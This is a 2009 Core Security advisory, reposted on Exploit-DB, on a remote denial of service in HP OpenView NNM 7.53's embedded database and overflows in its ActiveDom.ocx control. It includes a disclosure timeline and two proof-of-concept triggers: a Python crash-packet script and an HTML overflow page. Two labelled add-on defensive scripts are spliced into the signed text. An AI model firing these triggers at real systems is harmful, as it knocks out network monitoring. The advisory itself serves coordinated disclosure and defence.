HP OpenView Network Node Manager (OV NNM) 7.53 - Invalid DB Error Code

EDB-ID: 10176
Platform: Windows
Date: 2009-11-17

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

  HP Openview NNM 7.53 Invalid DB Error Code vulnerability



1. *Advisory Information*

Title: HP Openview NNM 7.53 Invalid DB Error Code vulnerability
Advisory Id: CORE-2009-0814
Advisory URL:
http://www.coresecurity.com/content/openview_nnm_internaldb_dos
Date published: 2009-11-17
Date of last update: 2009-11-17
Vendors contacted: HP
Release mode: Coordinated release


2. *Vulnerability Information*

Class: External Initialization of Trusted Variables [CWE-454]
Impact: Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-3840


3. *Vulnerability Description*

HP Openview Network Node Manager is one of the most widely-deployed
network monitoring and management platforms used throughout enterprise
organizations today. The platform includes many server and client-side
core components with a long list of previously disclosed security bugs.
In this case, a remotely exploitable vulnerability was found in the
database server core component used by NNM. Exploitation of the bug does
not require authentication and will lead to a remotely triggered denial
of service of the internal database service.


4. *Vulnerable packages*

   . HP Openview NNM 7.53

Other versions may be vulnerable but were not tested. Refer to the
vendor's security bulletin for a full list.


5. *Non-vulnerable packages*

Refer to the vendor's security bulletin.


6. *Vendor Information, Solutions and Workarounds*

The vendor issued security bulletin HPSBMA02477 SSRT090177 to address
the problem and provide fixes. It is available at
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01926980

The database service of HP Openview Network Node Manager is remotely
accessible on port 2690/tcp. Restricting or blocking access to that port
will prevent exploitation but may prevent normal operation of Openview NNM.


7. *Credits*

This vulnerability was discovered and researched by Damian Frizza from
Core Security Technologies.


8. *Technical Description / Proof of Concept Code*


8.1. *HP Openview NNM 7.53 Embedded DB Remote Denial Of Service*

HP Openview Network Node Manager includes an embedded database engine
service that is enabled by default and accepts remote connections on
port 2690/tcp. The service is implemented by 'ovdbrun.exe', which is
started automatically on boot. For certain transactions, upon receiving
a packet from the network, the service will attempt to determine and
display an error code string based on an error code number specified in
the packet. By sending a specially crafted packet with an invalid
error code number, it is possible to remotely trigger an exception that
forces abnormal termination of the service. It is unlikely that the bug
could be exploited for anything other than a remote denial of service.

The following code excerpt explains the problem:

/-----
005FED51   MOVZX EDX,BYTE PTR SS:[ESP+2]     #FCFF
005FED56   MOVSX ECX,WORD PTR SS:[ESP+3]
005FED5B   CMP ECX,-1
005FED5E   MOVSX EAX,WORD PTR SS:[ESP+5]     #FCFF
005FED63   MOV DWORD PTR DS:[ESI+10],EDX
005FED66   MOV EDX,DWORD PTR SS:[ESP+7]
005FED6A   MOV DWORD PTR DS:[ESI+14],ECX
005FED6D   MOV DWORD PTR DS:[ESI+18],EAX
005FED70   MOV DWORD PTR DS:[ESI+C],EDX
005FED73   JGE SHORT ovdbrun.005FED7E
005FED75   CMP EAX,-1
005FED78   JGE SHORT ovdbrun.005FED7E
005FED7A   CMP ECX,EAX
005FED7C   JE SHORT ovdbrun.005FED83
005FED7E   MOV EAX,1
005FED83   ADD ESP,0C
005FED86   RETN

- -----/

The code above checks for an error condition based on the value of an
Error Code field in the inbound network packet. An error condition is
explicitly handled if the Error Code value is less than or equal to -1,
in which case a MessageBox with a corresponding descriptive error string
will be presented to the user. However, by crafting a packet with any
negative value other than -1 in the Error Code field, the lookup for
the corresponding error string will fail, triggering a non-recoverable
error and thus terminating the server process.

The following python code can be used to reproduce the bug:

/-----
#!python
import socket
import struct

a =  struct.pack('<b', 2)
a += struct.pack('<H', 0)
a += struct.pack('<H',0xFEFF)
a += struct.pack('<H',0xFEFF)
a += "1234"

target_ip = 'X.X.X.X'

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect ((target_ip, 2690))

s.send(a)
s.close()

- -----/
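
The branch logic of the disassembly excerpt above, restated as a parser that a defender can run over the first bytes of a session to 2690/tcp to flag the condition described. This is an added example, not code from the Core advisory or from HP; it assumes the buffer at ESP holds the first 11 bytes of the inbound packet, and the names `routine_result` and `triage` and the sample payloads are constructed for illustration.

```python
import struct

# Layout read by the excerpt (assumption: ESP points at the start of the
# packet): 2 bytes skipped, unsigned byte at +2, signed 16-bit words at
# +3 and +5, 32-bit value at +7, all little-endian and unaligned.
HEADER = struct.Struct("<2xBhhI")

def routine_result(code_a, code_b):
    """Mirror the branches at 005FED73..005FED7E of the excerpt."""
    if code_a >= -1:        # JGE taken on the flags of CMP ECX,-1
        return 1
    if code_b >= -1:        # JGE taken after CMP EAX,-1
        return 1
    if code_a == code_b:    # JE skips MOV EAX,1, so EAX keeps the code
        return code_b
    return 1

def triage(payload):
    """Classify the first bytes a client sent to the database port."""
    if len(payload) < HEADER.size:
        return "short"
    _kind, code_a, code_b, _tail = HEADER.unpack_from(payload)
    result = routine_result(code_a, code_b)
    # A result other than 1 is a code below -1, the case the advisory
    # describes as having no matching error string.
    return "ok" if result == 1 else "flag: error code %d" % result

# Constructed sample payloads (hex), not captured traffic.
SAMPLES = {
    "zero codes":        bytes.fromhex("02 00 00 00 00 00 00 31 32 33 34"),
    "both codes -1":     bytes.fromhex("02 00 00 ff ff ff ff 31 32 33 34"),
    "codes differ":      bytes.fromhex("02 00 00 fe ff fd ff 31 32 33 34"),
    "both codes -257":   bytes.fromhex("02 00 00 ff fe ff fe 31 32 33 34"),
    "truncated":         bytes.fromhex("02 00"),
}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print("%-16s %s" % (name, triage(payload)))
```
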



8.2. *Additional information: Low severity bugs in ActiveDom.ocx ActiveX*

The ActiveX control 'ActiveDom.ocx' is shipped with HP Openview NNM 7.53
and installed by default. The control is prone to multiple memory
corruption bugs due to erroneous handling of overly long strings passed
to multiple methods. These bugs are considered of low severity because
the control is not configured as Safe for Scripting or Safe for
Initialization [1] and therefore cannot be exploited without explicit
user consent. Since the control was reported by the vendor as neither
used nor required by any component of OpenView NNM, finding deployed
systems with security configuration settings changed to allow
exploitation of these bugs is very unlikely. Nonetheless, information
about them is
included below for the purpose of completeness in the documentation of
this advisory.

Some of the ActiveX control's methods with implementation flaws are:

/-----
DisplayName(str)
AddGroup(str)
InstallComponent(str)
Subscribe(str, str, int)

- -----/

The following excerpt from method DisplayName() demonstrates the problem:

/-----
2000D408   MOV DWORD PTR SS:[EBP-4],-1
2000D40F   JMP SHORT ACTIVE~1.2000D3D6
2000D411   MOV EAX,ACTIVE~1.200361A0
2000D416   JMP <JMP.&MSVCRT.__CxxFrameHandler>
2000D41B   MOV EAX,ACTIVE~1.2000D4A8
2000D420   CALL <JMP.&MSVCRT._EH_prolog>
2000D425   SUB ESP,10
2000D428   PUSH EBX
2000D429   PUSH ESI
2000D42A   PUSH EDI
2000D42B   MOV DWORD PTR SS:[EBP-10],ESP
2000D42E   MOV DWORD PTR SS:[EBP-14],ECX
2000D431   XOR EBX,EBX
2000D433   MOV DWORD PTR SS:[EBP-4],EBX
2000D436   LEA ESI,DWORD PTR DS:[ECX+28]
2000D439   MOV ECX,DWORD PTR DS:[ESI]        ; ESI = 00038178
2000D43B   MOV EAX,DWORD PTR DS:[ECX]        ;
2000D43D   CALL DWORD PTR DS:[EAX+48]        ;

- -----/

The following HTML code can be used to trigger the bug:

/-----
<html>
<object classid='clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE' id='target'>
</object>

<script>
a = ""
for (i = 0; i < 10000; i++)
   a = a + "A"
target.DisplayName(a)
</script>
</html>


- -----/
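
A check for the registry settings that decide whether Internet Explorer will load and script this control: the Safe for Scripting and Safe for Initialization categories discussed above [1] and the kill bit workaround recorded in the report timeline [2]. This is an added example, not part of the Core advisory or HP's bulletin; the key paths and category IDs are the standard Windows ones, and the two .reg export texts are constructed sample input.

```python
import re

CLSID = "{A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE}"   # ActiveDom.ocx, from the advisory
KILL_BIT = 0x400                                   # bit in "Compatibility Flags"
COMPAT = "\\INTERNET EXPLORER\\ACTIVEX COMPATIBILITY\\" + CLSID
CATEGORIES = {                                     # component category IDs
    "{7DD95801-9882-11CF-9FA9-00AA006C42C4}": "safe for scripting",
    "{7DD95802-9882-11CF-9FA9-00AA006C42C4}": "safe for initialization",
}

def parse_reg(text):
    """Map each [key] in decoded .reg export text to its {name: raw value}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].upper(), {})
        elif current is not None and "=" in line:
            name, _, value = line.partition("=")
            current[name.strip('"').lower()] = value.strip()
    return keys

def audit(text):
    """Report where the kill bit is set and which safety categories exist."""
    kill_bit_keys, marked = [], set()
    for path, values in parse_reg(text).items():
        if path.endswith(COMPAT):
            flags = values.get("compatibility flags", "").lower()
            m = re.fullmatch(r"dword:([0-9a-f]{8})", flags)
            if m and int(m.group(1), 16) & KILL_BIT:
                kill_bit_keys.append(path)
        for catid, label in CATEGORIES.items():
            if path.endswith(CLSID + "\\IMPLEMENTED CATEGORIES\\" + catid):
                marked.add(label)
    return {"kill_bit_keys": kill_bit_keys, "marked_safe": sorted(marked)}

# Constructed .reg export text (sample input, not taken from a real host).
HARDENED = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE}]
"Compatibility Flags"=dword:00000400
"""
CHANGED = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE}]
"Compatibility Flags"=dword:00000000
[HKEY_CLASSES_ROOT\CLSID\{A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}]
"""

if __name__ == "__main__":
    print("hardened:", audit(HARDENED))
    print("changed: ", audit(CHANGED))
```

A control can also declare itself safe at run time through the IObjectSafety interface, which a registry export does not show.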



9. *Report Timeline*

. 2009-08-12:
Core Security Technologies notifies the HP Software Security Response
Team (SSRT) of the vulnerability and preliminary schedule to publish the
corresponding security advisory on September 8th 2009. Core asks for
acknowledgement of the email within 2 working days and whether HP SSRT
prefers to receive the technical description of the bug encrypted or in
plaintext.

. 2009-08-12:
HP SSRT asks Core to send the technical description of the vulnerability
encrypted using the PGP key with id 0x08B83D45.

. 2009-08-14:
Core Security Technologies sends technical details encrypted to HP SSRT.

. 2009-08-18:
HP SSRT informs Core that HP engineering have been notified and will
notify Core when they have a schedule estimate. SSRT assigned the IDs
SSRT090177 and SSRT090178 to the vulnerabilities reported by Core.

. 2009-08-27:
Core requests a status update from HP SSRT.

. 2009-08-27:
HP SSRT informs Core that the vulnerabilities are in third-party code
and that the third-party vendor has been notified but there isn't a
schedule for fixes yet. HP SSRT indicates that it is sure HP will not
have a solution ready by September 7th.

. 2009-08-27:
Core informs the HP team that the publication was re-scheduled to
September 21st and requests an update to continue coordinating the
release of fixes and publication of the advisory as soon as possible.

. 2009-08-28:
The HP team informs Core that the third party is planning a release on
October 30th for the first vulnerability. SSRT also notes that ActiveX
vulnerabilities are still being investigated.

. 2009-08-31:
Core Security Technologies acknowledges the information sent by HP SSRT.

. 2009-09-01:
The HP team communicates that they will inform Core Security
Technologies when the fix is available.

. 2009-09-04:
Core asks the HP SSRT to map HP's internal IDs to each of the reported
vulnerabilities.

. 2009-09-04:
The HP SSRT indicates that SSRT090177 corresponds to the embedded
database vulnerability and SSRT090178 to the ActiveX bugs.

. 2009-09-10:
Core Security Technologies notifies HP SSRT that publication of the
advisory has been re-scheduled to October 30th to be able to coordinate
the release with the issuance of fixes by the third party vendor and
that if non-third-party vulnerabilities (the ActiveX bugs) could be
fixed earlier they would be described in a separate advisory.

. 2009-09-11:
HP SSRT says that it will send any new information to Core on the
ActiveX bugs if they have something to publish before October 30th.

. 2009-09-21:
The HP team informs Core that they are having some problems reproducing
the ActiveX vulnerabilities reported. The NNM engineers have used the
provided proof-of-concept exploit but did not see any effect. SSRT asks
if an overflow was confirmed, if process failure was detected and if a
debugger or a different procedure was used.

. 2009-09-21:
Core Security Technologies notifies the HP SSRT that the proof of
concept crash can be observed using a classic debugger or a just-in-time
debugger that is attached only after an abnormal exception is detected.
Core also sends HP SSRT another proof of concept HTML code that crashes
the ActiveX and can be observed without the need of a debugger.

. 2009-09-22:
The HP team acknowledges previous email from Core with the new PoC to
reproduce the crashes without a debugger.

. 2009-10-06:
Core requests a status update from the SSRT noting that it hasn't
received any update since September 22nd. The advisory is still
scheduled for publication on October 30th and Core is waiting for
confirmation that the ActiveX bugs were reproduced and the fix for them
could be published earlier separately.

. 2009-10-09:
SSRT sends an update indicating that fixes from the third party for
SSRT090177 have been received and HP is currently in the process of
testing them on all platforms, expecting an update by October 16th. The
ActiveX bugs have been reproduced and HP determined that the vulnerable
control is not necessary for NNM. HP will recommend that customers set
the kill bit for the control
(clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE) as a workaround.

. 2009-10-19:
Core requests a status update and confirmation that HP will be ready to
release fixes by October 30th. Core asks if fixes will be issued for all
vulnerable versions of NNM, whether the fixes or patches will remove the
unnecessary ActiveX control or just ask customers to implement the
workaround. Core requests the complete lists of vulnerable versions and
platforms of NNM and asks if the patches will include fixes to other
bugs. Also, Core notes that the vendor of the third party component has
been identified and that since the bug may affect other products Core
will start a separate vulnerability report process directly with that
vendor.

. 2009-11-02:
Email from Core asking for a status update and an acknowledgement and
response to the questions from the previous email. Core notes that the
previously agreed publication date for the advisory has already passed
without any update from HP. The publication date has been unilaterally
moved to Wednesday, November 4th, 2009 and is considered final pending a
response from HP.

. 2009-11-03:
Response from HP SSRT stating that there is not an estimated release
date for patches to some platforms. With regards to the ActiveX bugs, a
security bulletin will be published on November 9th recommending setting
the kill bit.

. 2009-11-03:
Core indicates that since there isn't an estimated patch release date
for missing platforms the advisory will be published on November 9th and
will include guidance on how to implement workarounds for both problems.
Core asks SSRT about the potential impact of blocking or restricting
access to the vulnerable service as a workaround.

. 2009-11-05:
SSRT suggests that given that Core advisory will be published earlier
than HP's security bulletin it should have workarounds for all platforms
and not just for the ones that may not have a patch available
afterwards. HP is still investigating the impact of blocking or
restricting access to the vulnerable port. SSRT asks if Core wants any
acknowledgement in its security bulletin.

. 2009-11-05:
Core asks what is the planned publication date for HP's bulletin and
requests that the bulletin credits the discoverer (Damian Frizza).
Provided that the estimated date for publishing the bulletin is not
unreasonable Core would rather schedule the publication of the advisory
to match HP's.

. 2009-11-06:
SSRT informs Core that its estimate is to have hotfixes available
internally by November 13th and released along with the corresponding
security bulletins by November 17th. SSRT asks whether CVE numbers
should be assigned by HP or provided by Core.

. 2009-11-06:
Core re-schedules publication to November 17th. Core asks SSRT to assign
the CVE numbers.

. 2009-11-12:
HP SSRT reports that the ActiveX control is not marked as safe for
scripting or safe for initialization by default and thus the buffer
overflows in its methods do not seem to be security issues. Asks if Core
still considers them security vulnerabilities.

. 2009-11-16:
HP SSRT provides the CVE id assigned to the denial of service bug.
Indicates that the vendor's security bulletin will not suggest any
workarounds as the effect of blocking or restricting access to the
vulnerable service has not been determined.

. 2009-11-16:
Core confirms that the ActiveX control is not marked as safe for
scripting or initialization which greatly diminishes the relevance of
the reported bugs. Nonetheless, the information about the bugs will be
included in the advisory for the purpose of completeness and to let
users verify, and if necessary correct, the control's configuration
settings. Core still recommends that the vendor remove the unnecessary
control from installation packages and fix the reported bugs to avoid
potential introduction of flaws if it becomes a used control in the
future or should an alternative exploitation vector be found.

. 2009-11-17:
Publication of HP Security Bulletin SSRT090177.

. 2009-11-17:
Advisory CORE-2009-0814 published.



10. *References*

[1] Safe Initialization and Scripting for ActiveX Controls.
http://msdn.microsoft.com/en-us/library/aa751977(VS.85).aspx
[2] How to stop an ActiveX control from running in Internet Explorer.
http://support.microsoft.com/kb/240797


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAksDICYACgkQyNibggitWa2//ACdFpN6SK4B59Iza5Nq88oASfat
YhoAn24UcNlJ/lpKv4brl4d6mctKfwMF
=cR49
-----END PGP SIGNATURE-----